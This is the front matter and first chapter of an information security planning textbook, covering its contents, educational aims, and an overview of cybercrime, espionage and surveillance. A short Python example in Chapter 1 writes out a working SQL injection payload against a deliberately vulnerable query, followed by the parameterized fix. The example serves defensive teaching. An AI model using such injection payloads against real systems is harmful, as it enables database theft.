Information Security Planning: A Practical Approach (ISBNs 3031431170, 9783031431173)

This book demonstrates how information security requires a deep understanding of an organization's assets, threats


English · 466 [446] pages · 2024


Table of contents:
Preface: How to Use This Book
For the Educator
Addressing Educational Criteria
Teaching Aides for the Security Instructor
Disclaimer
Acknowledgments
Contents
Part I: The Problem of Security
Chapter 1: Security Awareness: Brave New World
1.1 With Security, Every Person Counts
1.2 Attackers and Motives
1.2.1 Cybercrime
1.2.2 Espionage
1.2.3 Information Warfare
1.3 Criminal Techniques to Enter, Investigate, and Persist in a Network
1.4 Protecting Yourself
1.5 Questions
References
Chapter 2: Combatting Fraud
2.1 Internal Fraud
2.1.1 Defenses Against Internal Fraud
2.1.2 Recognizing Fraud
2.2 External Fraud
2.2.1 Identity Theft
2.2.2 Social Engineering
2.2.3 Business Email Compromise
2.2.4 Consumer Fraud
2.2.5 Receipt, Check, and Money Order Scams
2.2.6 Developing an Action Plan
2.3 Advanced: A Fraud Investigation
2.4 Questions and Problems
2.4.1 Health First Case Study Problems
References
Chapter 3: Complying with the PCI DSS Standard
3.1 Applicability
3.2 Background and Threats
3.3 General Requirements
3.3.1 Definitions
3.3.1.1 Payment Card Information
3.3.1.2 Payment Card Configuration
3.3.2 PCI DSS Requirements
3.3.2.1 Build and Maintain a Secure Network
3.3.2.2 Protect Cardholder Data
3.3.2.3 Maintain a Vulnerability Management Program
3.3.2.4 Implement Strong Access Control Measures
3.3.2.5 Regularly Monitor and Test Networks
3.3.2.6 Maintain an Information Security Policy
3.3.3 Additional Requirements for Sophisticated Configurations
3.3.4 The PCI DSS Approval Process and Annual Assessments
3.3.5 Other Security Concerns
3.4 Specific Vendor Requirements
3.5 Advanced: Software Security Framework
3.6 Questions and Problems
References
Part II: Strategic Security Planning
Chapter 4: Managing Risk
4.1 Risk Management Overview
4.1.1 Step 1: Identify Risks
4.1.2 Step 2: Determine Loss Due to Threats
4.1.3 Step 3: Estimate Likelihood of Exploitation
4.1.4 Step 4: Compute Expected Loss
4.1.5 Step 5: Treat Risk
4.1.6 Step 6: Monitor (and Communicate) Risk
4.2 The Ethics of Risk
4.3 Advanced: Financial Analysis with Business Risk
4.4 Advanced: Risk for Larger Organizations
4.5 Questions and Problems
4.5.1 Health First Case Study Problems
References
Chapter 5: Addressing Business Impact Analysis and Business Continuity
5.1 Business Impact Analysis
5.1.1 Step 1: Define Threats Resulting in Business Disruption
5.1.2 Step 2: Define Recovery Objectives
5.2 Step 3: Business Continuity: Plan for Recovery
5.2.1 Recovery Sites
5.2.2 High-Availability Solutions
5.2.3 Disk Backup and Recovery
5.3 Step 4: Preparing for IT Disaster Recovery
5.4 Advanced: Business Continuity for Mature Organizations
5.5 Advanced: Considering Big Data Distributed File Systems
5.6 Questions
5.6.1 Health First Case Study Problems
References
Chapter 6: Governing: Policy, Maturity Models and Planning
6.1 Documenting Security: Policies, Standards, Procedures and Guidelines
6.2 Maturing the Organization via Capability Maturity Models and COBIT
6.3 Strategic, Tactical and Operational Planning
6.4 Allocating Security Roles and Responsibilities
6.5 Questions
6.5.1 Health First Case Study Problems
References
Part III: Tactical Security Planning
1.1 Important Tactical Concepts
Chapter 7: Designing Information Security
7.1 Important Concepts and Roles
7.2 Step 1: Classify Data for CIA
7.3 Step 2: Selecting Controls
7.3.1 Selecting AAA Controls
7.3.2 Authentication: Login or Identification
7.3.2.1 Biometric Systems
7.3.3 Authorization: Access Control
7.3.4 Accountability: Logs
7.3.5 Audit
7.4 Step 3: Allocating Roles and Permissions
7.5 Advanced: Administration of Information Security
7.6 Advanced: Designing Highly Secure Environments
7.6.1 Bell and La Padula Model (BLP)
7.7 Questions
7.7.1 Health First Case Study Problems
References
Chapter 8: Planning for Network Security
8.1 Important Concepts
8.1.1 How Crackers Attack
8.1.2 Filtering Packets to Restrict Network Access
8.2 Defining the Network Services
8.2.1 Step 1: Inventory Services and Devices: Who, What, Where?
8.2.1.1 Inventorying Devices
8.2.2 Step 2: Determine Sensitivity of Services
8.2.3 Step 3: Allocate Network Zones
8.2.4 Step 4: Define Controls
8.3 Defining Controls
8.3.1 Confidentiality Controls
8.3.2 Authenticity & Non-Repudiation
8.3.3 Integrity Controls
8.3.4 Anti-Hacker Controls
8.4 Defining the Network Architecture
8.4.1 Step 5: Draw the Network Diagram
8.5 Advanced: How it Works
8.6 Questions
8.6.1 Health First Case Study Problems
References
Chapter 9: Designing Physical Security
9.1 Step 1: Inventory Assets and Allocate Sensitivity/Criticality Class to Rooms
9.2 Step 2: Selecting Controls for Sensitivity Classifications
9.2.1 Building Entry Controls
9.2.2 Room Entry Controls
9.2.3 Computer and Document Access Control
9.2.4 The Public Uses Computers
9.3 Step 3: Selecting Availability Controls for Criticality Classifications
9.4 Questions and Problems
9.4.1 Health First Case Study Problems
References
Chapter 10: Attending to Information Privacy
10.1 Important Concepts and Principles
10.2 Step 1: Defining a Data Dictionary with Primary Purpose
10.3 Step 2: Performing a Privacy Impact Assessment
10.3.1 Defining Controls
10.3.2 Anonymizing Data
10.4 Step 3: Developing a Policy and Notice of Privacy Practices
10.5 Advanced: Big Data: Data Warehouses
10.6 Questions
References
Chapter 11: Planning for Alternative Networks: Cloud Security and Zero Trust
11.1 Important Concepts
11.1.1 Cloud Deployment Models
11.2 Planning a Secure Cloud Design
11.3 Step 1: Define Security and Compliance Requirements
11.4 Step 2: Select a Cloud Provider and Service/Deployment Model
11.5 Step 3: Define the Architecture
11.6 Step 4–6: Assess and Implement Security Controls in the Cloud
11.7 Step 7: Monitor and Manage Changes in the Cloud
11.8 Advanced: Software Development with Dev-Sec-Ops
11.9 Advanced: Using Blockchain
11.10 Advanced: Zero Trust
11.10.1 Important Concepts
11.10.2 Zero Trust Architecture
11.11 Zero Trust Planning
11.11.1 Network and Cloud Checklist for Zero Trust
11.12 Questions
References
Chapter 12: Organizing Personnel Security
12.1 Step 1: Controlling Employee Threats
12.2 Step 2: Allocating Responsibility to Roles
12.3 Step 3: Define Training for Security
12.4 Step 4: Designing Tools to Manage Security
12.4.1 Code of Conduct and Acceptable Use Policy
12.4.2 Configuration Management and Change Control
12.4.3 Service Level Agreements
12.5 Questions and Problems
12.5.1 Health First Case Study Problems
References
Part IV: Planning for Detect, Respond, Recover
Chapter 13: Planning for Incident Response
13.1 Important Statistics and Concepts
13.2 Developing an Incident Response Plan
13.2.1 Step 1: Preparation Stage
13.2.1.1 Bringing in the Law
13.2.2 Step 2: Identification Stage
13.2.3 Step 3: Containment and Escalation Stage
13.2.4 Step 4: Analysis and Eradication Stage
13.2.5 Step 5: Notification and Ex-post Response Stages (If Necessary)
13.2.6 Step 6: Recovery and Lessons Learned Stages
13.3 Preparing for Incident Response
13.4 Questions and Problems
13.4.1 Health First Case Study Problems
References
Chapter 14: Defining Security Metrics
14.1 Implementing Business-Driven Metrics
14.2 Implementing Technology-Driven Metrics
14.3 Questions and Problems
14.3.1 Health First Case Study Problems
References
Chapter 15: Performing an Audit or Security Test
15.1 Testing Internally and Simple Audits
15.1.1 Step 1: Gathering Information, Planning the Audit
15.1.2 Step 2: Reviewing Internal Controls
15.1.3 Step 3: Performing Compliance and Substantive Tests
15.1.4 Step 4: Preparing and Presenting the Report
15.2 Example: PCI DSS Audits and Report on Compliance
15.3 Professional and External Auditing
15.3.1 Audit Resources
15.3.2 Sampling
15.3.3 Evidence and Conclusions
15.3.4 Variations in Audit Types
15.4 Questions and Problems
15.4.1 Health First Case Study Problems
References
Chapter 16: Preparing for Forensic Analysis
16.1 Important Concepts
16.2 High-Level Forensic Analysis: Investigating an Incident
16.2.1 Establishing Forensic Questions
16.2.2 Collecting Important Information
16.3 Technical Perspective: Methods to Collect Evidence
16.3.1 Collecting Volatile Information Using a Jump Kit
16.3.2 Collecting and Analyzing Important Logs
16.3.3 Collecting and Forensically Analyzing a Disk Image
16.4 Legal Perspective: Establishing Chain of Custody
16.5 Advanced: The Judicial Procedure
16.6 Questions and Problems
References
Part V: Complying with National Regulations and Ethics
References
Chapter 17: Complying with the European Union General Data Protection Regulation (GDPR)
17.1 Background
17.2 Applicability
17.3 General Requirements
17.4 Rights Afforded to Data Subjects
17.4.1 Right of Access by the Data Subject (Article 15)
17.4.2 Right to Rectification (Article 16)
17.4.3 Right to Erasure (‘Right to Be Forgotten’) (Article 17)
17.4.4 Right to Restriction of Processing (Article 18)
17.4.5 Right to Data Portability (Article 20)
17.4.6 Right to Object to Processing (Article 21)
17.4.7 Right to Not Be Subject to a Decision Based Solely on Automated Processing (Article 22)
17.4.8 Rights of Remedies, Liabilities and Penalties (Articles 77–79)
17.4.9 Privilege of Notification (Article 13, 14)
17.4.10 Privilege of Communicated Response (Article 12)
17.4.11 Privilege of Protection of Special Groups (Article 9, 10)
17.5 Restrictions to Rights (Article 23)
17.6 Controller Processing Requirements
17.6.1 Risk Management and Security
17.6.2 Breach Notification
17.6.3 Penalties
17.6.4 Certification and Adequacy Decisions
17.6.5 Management and Third-Party Relationships
17.7 Actual GDPR Cases
17.8 Questions and Problems
References
Chapter 18: Complying with U.S. Security Regulations
18.1 Security Laws Affecting U.S. Organizations
18.1.1 State Breach Notification Laws
18.1.2 HIPAA/HITECH Act, 1996, 2009
18.1.3 Sarbanes-Oxley Act (SOX), 2002
18.1.4 Gramm–Leach–Bliley Act (GLB), 1999
18.1.5 Identity Theft Red Flags Rule, 2007
18.1.6 Family Educational Rights and Privacy Act (FERPA), 1974, and Other Child Protection Laws
18.1.6.1 Children’s Online Privacy Protection Act (COPPA), 1998
18.1.6.2 Children’s Internet Protection Act (CIPA), 2000
18.1.7 Federal Information Security Management Act (FISMA), 2002
18.1.8 California Consumer Privacy Act (CCPA)
18.2 Computer Abuse Laws
18.3 Other Laws
18.4 Final Considerations
18.5 Advanced: Understanding the Context of Law
18.6 Questions and Problems
References
Chapter 19: Complying with HIPAA and HITECH
19.1 Background
19.2 Introduction and Vocabulary
19.3 HITECH Breach Notification
19.4 HIPAA Privacy Rule
19.4.1 Patient Privacy and Rights
19.4.1.1 Disclosures
19.4.1.2 De-identification and Limited Data Sets
19.5 HIPAA Security Rule
19.5.1 Administrative Requirements
19.5.2 Physical Security
19.5.3 Technical Controls
19.6 Recent and Proposed Changes in Regulation
19.7 Questions and Problems
19.7.1 Health First Case Study Problems
References
Chapter 20: Maturing Ethical Risk
20.1 Important Concepts
20.2 Raising Ethical Maturity through an Ethical Risk Framework
20.2.1 Raising Self-centered Ethical Concern
20.2.1.1 Open Communication
20.2.1.2 Develop a Code of Ethics
20.2.1.3 Provide an Anonymous Reporting Mechanism for Ethical Violations
20.2.2 Adhering to Regulation
20.2.2.1 Address Regulation Fully
20.2.2.2 Evaluate Legal Responsibility Beyond Regulation
20.2.2.3 Manage Projects Responsibly
20.2.3 Respecting Stakeholder Concerns
20.2.3.1 Personalize Risk
20.2.3.2 Evaluate Trade-offs of Concern
20.2.4 Addressing Societal Concerns
20.2.4.1 Think Outside the Engineer Role
20.2.4.2 Inform of Safety and Security Concerns to Customers
20.2.4.3 Evaluate Unknown Risk
20.3 Questions
References
Part VI: Developing Secure Software
Chapter 21: Understanding Software Threats and Vulnerabilities
21.1 Important Concepts and Goals
21.2 Threats to Input
21.2.1 Recognize Injection Attacks
21.2.2 Control Cross-site scripting (XSS)
21.2.3 Authentication and Access Control
21.2.4 Recognize Cross-Site Request Forgery (CSRF)
21.2.5 Minimize Access
21.3 Implement Security Features
21.4 Testing Issues
21.5 Deployment Issues
21.5.1 Validate and Control the Configuration
21.5.2 Questions and Problems
References
Chapter 22: Defining a Secure Software Process
22.1 Important Concepts
22.1.1 Software Security Maturity Models
22.1.2 The Secure Software Group
22.2 Secure Development Life Cycle
22.2.1 Coding
22.2.2 Testing
22.2.3 Deployment, Operations, Maintenance and Disposal
22.3 Secure Agile Development
22.3.1 Designing Agile Style: Evil User Stories
22.4 Example Secure Process: PCI Software Security Framework
22.5 Security Industry Standard: Common Criteria
22.6 Questions and Problems
22.6.1 Health First Case Study Problems
References
Chapter 23: Planning for Secure Software Requirements and Design with UML
23.1 Important Concepts and Principles in Secure Software Design
23.2 Evaluating Security Requirements
23.2.1 Step 1: Identify Critical Assets
23.2.2 Step 2: Define Security Goals
23.2.3 Step 3: Identify Threats
23.2.4 Step 4: Analyze Risks
23.2.5 Step 5: Define Security Requirements
23.2.6 Specify Reliability, Robustness
23.3 Analysis/Design
23.3.1 Static Model
23.3.2 Dynamic Model
23.3.2.1 Sequence Diagrams
23.3.2.2 State Transition Diagrams
23.4 Example Secure Design: PCI Software Security Framework
23.5 Questions and Problems
23.5.1 Health First Case Study Problems
References

Susan Lincke

Information Security Planning: A Practical Approach
Second Edition


Susan Lincke
University of Wisconsin-Parkside
Kenosha, WI, USA

ISBN 978-3-031-43117-3 · ISBN 978-3-031-43118-0 (eBook)
https://doi.org/10.1007/978-3-031-43118-0

© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2015, 2024

This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed.

The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use.

The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

This Springer imprint is published by the registered company Springer Nature Switzerland AG. The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland.

Paper in this product is recyclable.

Preface: How to Use This Book

This book is useful in organizational security planning. This text was written for people who are not computer experts, including business managers or owners with no previous IT background, or overworked IT staff and students, who are looking for a shortcut in understanding and designing security. The text has examples to help you understand each required step within the workbook. The best design will eventually involve both business and IT/security people.

This second edition of the book is an international edition, covering the worldwide standard Payment Card Industry Data Security Standard (PCI DSS), the European GDPR, and American security laws, with a special chapter on HIPAA/HITECH. This edition also has chapters on data privacy, forensic analysis, advanced networks (cloud and zero trust), and ethics, and an expanded section on secure software.

The associated Security Workbook has been designed to guide security neophytes through the security planning process. You may edit this Microsoft Word version of the Security Workbook for your own organization's use. This tool is available from your text download site or the book's web site at https://sn.pub/lecturer-material.

This book can be used out of order, although it is recommended that you read Part I to understand security threats before proceeding to later parts. The applicable chapters in Part V on regulation (the European GDPR and diverse US laws) are also a good way to understand the security challenges and prioritize your required planning. Once you understand the threats, PCI DSS requirements, and applicable regulation, Chap. 5 on Business Continuity and Chap. 7 on Information Security are very important before proceeding to Chap. 8 on Network Security and later chapters. While you may work through the chapters out of order, each applicable chapter is important in making your organization attack-resistant.

Optional topics may be applicable to your organization. Part VI, Developing Secure Software, is only applicable for software engineers. Since this is an international edition, laws for nations outside your home country may or may not be applicable, depending on where you do business. The forensic analysis, information privacy, cloud/zero trust, and governance topics may be applicable depending on your organizational role and technical abilities, and your company's regulation and network configuration. Advanced sections within some chapters are optional reading and not absolutely necessary to develop initial security plans. They offer a broader knowledge base to understand the security environment and address relevant background topics that every security professional should know.

It is important to recognize that even large, well-funded organizations with full-time professional security staff cannot fully secure their networks and computers. The best they can do is to make the organization a very difficult target. The problem with security is that the attacker needs to find one hole, while the defender needs to close all holes—an impossibility. However, with this text you are well on your way to making your organization attack-resistant.

This book guides security planning for a simple-to-medium level security installation. After your design is done, you must implement your plan! While you can do much security planning without IT/security expertise, eventually IT experts are needed to implement the technical aspects of any plan. It will be useful at that time to discuss your security design with your IT specialists, be they in-house or external. Alternatively, if you are technical, you will need cooperation from business management to understand where sensitive data lies and what the regulatory concerns are, in order to plan organizational security well.

For organizations requiring a high level of security, such as banks and the military, this text is a start but is insufficient by itself. This book is also a stepping stone for organizations that must adhere to a high level of security regulation and standards. The best implementation can start with this book, but must also address each item of each regulation or standard your organization must adhere to.

For the Educator

This book has aspects for course differentiation, making it useful to the professional, technical, business, and potentially medical educational communities, and for courses from the lower level through introductory graduate. For the security professional or service-learning educator, some chapters can be read and performed out of order (or in order of reader priority). The prerequisite understanding is always described at the beginning of each section and the beginning of each chapter.

Each chapter ends with a small set of questions and one or more case study exercises. The questions are meant for simpler levels of sophistication, such as a review of vocabulary, web research into more resources, and application of the workbook for varying industries and security regulations. A more sophisticated course can delve into a longitudinal case study, either in an industry of the student groups' choosing or on the Health First Doctor's Office, which must adhere to HIPAA or GDPR. These case studies use the Security Workbook for organizational security planning. The case study can be used as group homework or as an active learning exercise in class. Alternatively, students can use the Security Workbook for service learning purposes, working with real organizational partners in the community.

For technically minded instructors and students, there is a section on Secure Software, covering threats, secure development processes, and secure designs using agile (evil user stories) or traditional (UML) styles. A special set of case studies is available just for software developers to use in combination with a Security Requirements Document for secure software planning.

Addressing Educational Criteria

For American universities wishing to achieve a National Security Agency (NSA) designation, this book attempts to address the Center of Academic Excellence Cyber Defense (CAE-CD) plan for 2020, including some Mandatory and Optional Knowledge Units (KU). While the book has not been submitted to or approved by the NSA, the author has attempted to address each item in their list, to simplify the accreditation process. The book attempts to cover the entirety of the CAE-CD Nontechnical Core requirements. Often 'Advanced' sections cover more sophisticated topics beyond security planning. Very technical subjects (e.g., programming, networks, operating systems) are meant to be covered in other courses. CAE-CD Knowledge Units addressed include:

• Foundational: Cybersecurity Principles
• Technical Core: Network Defense
• Nontechnical Core: Cyber Threats, Cybersecurity Planning and Management, Policy, Legal, Ethics, and Compliance, Security Program Management, Security Risk Analysis
• Optional KUs: Basic Cyber Operations, Cyber Crime, Cybersecurity Ethics, Fraud Prevention and Management, IA Compliance, Life-Cycle Security, Privacy
• Optional KUs at Introductory Level: Cloud Computing, Digital Forensics, Software Assurance, Secure Programming Practices

The last category, Optional KUs at Introductory Level, introduces the vast majority of topics in the KU but generally lacks one or more deeply technical exercises that are required as outcomes.

The text also meets most 2013 ACM Information Assurance and Security "Core" requirements for Computer Science, including Foundational Concepts, Principles of Secure Design, Defensive Programming, Threats and Attacks, and some of Network Security. Addressed electives include Security Policy, Secure S/W Engineering, and most of Web Security. The mapping of requirements to chapters is outlined on the companion web site.


Finally, the base of this text is derived from ISACA’s Certified Information Systems Auditor® (CISA) and Certified Information Security Manager® (CISM) study guides related to security. Other parts of these guides are generally covered by other courses, such as project management, networking, and software engineering. Students may pass these exams with additional study, particularly using ISACA’s CISA or CISM question disks.

Teaching Aides for the Security Instructor

Many materials are available with this text for your teaching use. Instructor/student materials are included on the companion web site, at https://sn.pub/lecturer-material. Extra materials include the following:

1. Lecture PowerPoints: PowerPoint lectures include end-of-lecture questions for discussion in class. These questions are patterned after ISACA's CISA and CISM questions.
2. Security Workbook: The Security Workbook guides student teams through a design. There are two ways for student teams to develop a security plan. Option 1 designs a hypothetical organization of the student teams' choosing, e.g., in retail, hospitality, government, healthcare, financial, or software services. This has the advantage that students can contrast security plans for different types of businesses in the same course, through student presentations. Option 2 uses the Health First Case Study, a detailed case study. This has the advantage that details are available for the business.
3. Health First Case Study, Security Workbook, and Solution: A case study involving security planning for a hypothetical Health First doctor's office is available for classroom use. Each chapter on security design in this text has at least one associated case study to choose from within the Health First Case Study. The case study includes discussion by the Health First employees of the business scenario. The Security Workbook guides students through the security process. A solution is available on the companion web site for instructors. If you choose to do the case study, it is helpful to understand/present the applicable American Health Insurance Portability and Accountability Act (HIPAA) regulation or European GDPR before starting the case study.
4. Health First Requirements Document Case Study: The Secure Software chapter enthuses students who intend to be software or web developers. The Health First Case Study includes cases where students add security to a professional Requirements Document. A security-poor Requirements Document is available for download.
5. Instructor Guide: There is a guide to how to use this case study in your classroom.

You may also use the Security Workbook as a service learning exercise with small businesses, who often welcome the free help, if you choose.

Disclaimer

The author and publisher do not warrant or guarantee that the techniques contained in these works will meet your requirements. The author is not liable for any inaccuracy, error, or omission, regardless of cause, in the work or for any damages resulting therefrom. Under no circumstances shall the author be liable for any direct, indirect, incidental, special, punitive, consequential, or similar damages that result from the use of, or inability to use, these works.

Kenosha, WI, USA

Susan Lincke

Acknowledgments

Many thanks go to people who used or reviewed the materials, or assisted in the development of the case study for the first and/or second edition. They include Matt McPherson, Viji Ramasamy, Tony Aiello, Danny Hetzel, Stephen Hawk, David Green, Heather Miles, Joseph Baum, Mary Comstock, Craig Baker, Todd Burri, Tim Dorr, Tim Knautz, Brian Genz, LeRoy Foster, Misty Lowery, and Natasha Ravnikar, as well as the University of Wisconsin-Parkside for funding my sabbatical for the first edition. Thanks also to the National Science Foundation, who funded the development of the workbook and case study (though this work does not necessarily represent their views). Finally, thanks to the organizations and people who worked with my students in service learning projects and who must remain anonymous.

The case of Einstein University represented in this text is purely fictional and does not represent the security plan of any actual university.

Kenosha, WI, USA

Susan Lincke



Part I

The Problem of Security

This section explains why security is an issue that must be addressed. It delves into current problem areas that certain industries may specifically need to address, relating to hackers and malware (Chap. 1), social engineering and fraud (Chap. 2), and payment card standards, which organizations must adhere to if they accept credit cards (Chap. 3). Regulation relating to security also needs to be addressed; it is covered in Part V, which outlines United States and European Union regulation. Understanding inherent threats and security requirements well will help in later sections to define your organization's specific security needs. Therefore, as you read through this section, consider which attacks might affect your industry and organization, and, as part of the planning process, note them down.

Chapter 1

Security Awareness: Brave New World

When Leon Panetta, former U.S. Secretary of Defense, drives his internet-connected Lexus, he gives careful (likely semi-serious) instructions to his passengers: "I tell my wife, 'Now be careful what you say.'" – Nicole Perlroth, author of This Is How They Tell Me the World Ends and NY Times cybersecurity writer [1]

Computer security is a challenge. An attacker only needs to find one hole, but a defender needs to close all holes. Since it is impossible to close all holes, you can only hope to close most holes, layer defenses (like you layer clothes when going out in the freezing cold), and hope that the intruder will find an easier target elsewhere. How do you close most holes? The first step is to educate yourself about security and the ways crackers attack. The next step is to ensure that all employees understand their roles in guarding security. This chapter is about educating yourself on malware, hacking and the motives of computer attackers, and about how to start defending the simplest of devices: your mobile and home computers.

1.1 With Security, Every Person Counts

Imagine you open 20+ emails daily. Today you receive one with a promising video, and you click to download it. Most emails are innocuous, but this one contains hidden malware. While you enjoy your video, it is also secretly executing a worm, turning your computer into a zombie or copying password files. You are now, unknowingly, infected (but the video was cool!). Alternatively, an infected email, called a phish, may claim to be from someone in your organization, sending you an infected Word or Excel document that appears to be a routine business email. Installing malware within a network is only the first step an attacker takes in order to get a foothold in the network. The end goal is likely to be:
• exfiltrating (or downloading) confidential or proprietary business or government information for espionage, competitive and/or financial cybercrime reasons;
• financial extortion through damaging your files, overwhelming your servers, and/or promising to publish confidential data if a fee is not paid;


• disruption of business, by damaging equipment or overwhelming webpages, e.g., for information warfare purposes;
• financial theft through impersonating a vendor, inflating advertising clicks, or other fraudulent activities (covered in Chap. 2).

1.2 Attackers and Motives

Business managers, computer programmers, and others employed in IT/security fields should be aware of how an organization can be attacked, beyond user security awareness. Threats may arise from disgruntled employees or contractors, political enemies, financially motivated criminals, and spies or spying governments. This chapter reviews each of these in turn. Consider which of these might be prioritized as risks for your organization.

1.2.1 Cybercrime

In most attacks, the attacker has criminal intent. The attacker's goal may be extortion: encrypting crucial disks and demanding payment to decrypt them. Ransomware (e.g., CryptoLocker) can corrupt backups before demanding payment [39]. Often there is an explicit threat that the organization's confidential information will be released. Thus, even if there is a good backup to recover the database, extortioners may demand payment to prevent public disclosure. In May 2021, Colonial Pipeline's network was ransomed; the company took down its entire pipeline system, halting delivery of 45% of the gasoline, diesel, and jet fuel for the U.S. East Coast for nearly a week and affecting business all along the coast [31]. Colonial Pipeline paid $5 million to the ransomers.

Extortion may also be demanded for a Distributed Denial of Service (DDOS) attack, where an organization's network or prime web server is overwhelmed with fake transactions, and the ransomers demand payment to stop [39]. Verizon's 2022 Data Breach Investigations Report indicates that DDOS attacks generate a median of 1.3 Gbps of packets for 4 h. The vast majority of organizations experience such attacks less than 10 times per year, if not a heavy target [2].

Data breaches, whether used with ransomware or simply to obtain information for sale or use, are also primarily conducted for cybercrime purposes. The same Verizon report indicates that stolen information includes personal (77%), medical (43%), other (15%) and bank (9%) records [2]. Personal, medical and financial information can be sold or used for identity theft purposes.

It is important to understand the cost of ignoring security. Company websites are also prone to breaches for cybercrime reasons. In July 2013, five foreign hackers


stole and sold 160 million credit card numbers from a number of companies, including J.C. Penney, 7-Eleven, JetBlue, Heartland Payment Systems (a credit/debit processing company), Citibank, PNC Bank, Nasdaq, supermarket Hannaford, and the French retailer Carrefour. The technique used by these criminals was an SQL injection attack, where a criminal alters database commands by manipulating forms at websites, in order to extract or change information in the database. Heartland disclosed that it lost $200 million due to the credit card losses [3].

A final way for cybercriminals to make money is through the sale of malware (malicious software or attack software). Web cracking is lucrative, attracting organized criminals who often live outside the countries they attack. Crime rings tend to have specialized skills, where each person has a specific role: the skilled person who breaks into sites, the person who extracts credit card information, and the person who sells the data [3]. When caught internationally, they can be extradited to the country where the crime was committed. One well-known crime ring is the Russian Business Network, which specializes in malware, identity theft, and child pornography [6].

An antidote to web cracking is skilled penetration testing (or pen testing). Criminals probe your website, so you too must find all security holes before they do. If an organization develops any software or firmware, it is important to have programmers who are skilled in software security develop or review all code.
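To make the mechanics of SQL injection concrete, here is a minimal, hypothetical sketch in Python (the table, names and attacker input are invented for illustration; this is not code from any of the breached companies). The first query pastes user input directly into the SQL command, so the attacker's quote characters rewrite the query; the parameterized version treats the same input as plain data.

```python
# Hypothetical illustration of an SQL injection flaw; sqlite3 stands
# in for any SQL database behind a web form.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, card TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', '4111-1111-1111-1111')")

user_input = "x' OR '1'='1"  # attacker-supplied form field

# VULNERABLE: the input becomes part of the SQL command, so the
# injected OR clause matches (and dumps) every row in the table.
rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'").fetchall()
print(rows)  # [('alice', '4111-1111-1111-1111')] -- data leaked

# SAFER: a parameterized query treats the input as data, never as SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)  # [] -- no user is literally named "x' OR '1'='1"
```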

1.2.2 Espionage

Spying and disruption are the goals of some governments and hacker groups. Theft of intellectual property occurs when a company puts money into designing a product, but soon finds it must compete with a foreign company that stole its design. Chinese tactics to obtain information include purchasing high-tech companies, requiring trade secrets to be shared in exchange for access to the Chinese market, and theft through secret installation of Trojan horses and exfiltration. Another technique is to invite Chinese nationals living in the U.S. or Europe to present their expertise in technologies at Chinese conferences: wining and dining them, taking them on all-expenses-paid sightseeing tours, paying a speaker fee, and then asking for more information in a continuing relationship [33]. Defenses include prohibiting presentations on corporate technologies, with companies minimally firing employees for violations. Jail sentences have ranged from 27 months to 20–24 years for spy recruiters.

Spying also occurs for internal government information and control. It is believed that China used infected, command-and-control email against embassies, foreign ministries, Chinese dissidents and Tibetan exile centers in 2009. The Canadian government was infected with a spyware virus in 2011 that was traced back to China [23].


The New York Times has published its experience with a Chinese intrusion, an example of a lengthy targeted attack called an Advanced Persistent Threat (APT). It is described here because of the depth of information provided by their story [21]. Hackers most likely gained initial entrance through spear phishing, set up backdoors into users' machines, and then installed 45 pieces of custom malware, the majority of which was not recognized by antivirus software. Hackers also stole passwords for every Times employee and proceeded to hack into the personal computers of 53 employees. Security experts indicate that the Chinese were interested in learning about informants for reports relating to China's prime minister, Wen Jiabao. Fortunately, they left customer data alone. Hacker teams started their attacks at 8 AM Beijing time and hacked continuously, sometimes until midnight. Attacks were launched through American universities, which have labs filled with computers. After 4 months of attacks, the New York Times finally managed to eliminate the Chinese threat, with the assistance of the Mandiant security company. The Wall Street Journal and Washington Post have also reported being hacked [44]. Cybercrime organizations also use APTs on other industries, but those stories are rarely published, for privacy reasons.

One advanced persistent threat technique that emerged in 2020 was the supply chain attack, where a criminal organization implanted malware into a software product of a victim organization (SolarWinds), which was then unknowingly uploaded as updates into 18,000 organizations that used that software product [32, 34]. This particular attack was believed to have been instigated by the Russian government, corrupting a tool within the JetBrains IDE tools. It demonstrates a vulnerability in the use of third-party software. However, it is still recommended that patches be applied to your software, since most patches fix security issues and defects, while supply chain attacks remain rare.

The Surveillance State arises where a government monitors Internet traffic and data. In the suspicious years following the 9/11 attacks, the U.S. National Security Agency (NSA) and/or Federal Bureau of Investigation (FBI) intimidated a number of organizations, including Verizon, Google, Yahoo, Microsoft and Facebook, and gag orders prevented the companies from speaking out [15]. Edward Snowden's releases uncovered that nearly 200 million records were sent to the NSA from Yahoo and Google in December 2012 alone, including email metadata (headers) and content [16]. The NSA has requested or manipulated companies to water down encryption algorithms and install backdoors in software products, as well as to provide communication data [17].

One story that has emerged is that of Lavabit, a company which provided secure email services [40]. Lavabit had been asked to place taps on a few accounts and had complied. However, in the spring of 2013, the FBI asked Ladar Levison, Lavabit's founder, for a tap for Snowden. They asked for passwords for all his clients, the organization's private key (which decrypts all encryptions sent by the company), and computer code. Levison attempted to negotiate to provide Snowden's information daily, but the FBI wanted the information in real time (minute by


minute). Levison was fined $5000 per day by a court until he provided the key electronically. After 2 days, Levison complied and closed his company down. That day, he wrote on his website: "I would strongly recommend against anyone trusting their private data to a company with physical ties to the United States" [19]. Unfortunately, such government spying and intrusion is likely to make buyers wary of products from any country involved in information warfare or surveillance state actions, due to disintegrated trust [41]. In response to the Snowden leaks, American President Obama promised to name a new senior official to implement new privacy measures to protect the American people, ordinary foreign people, and foreign leaders when a "compelling national security purpose" is not evident [20].

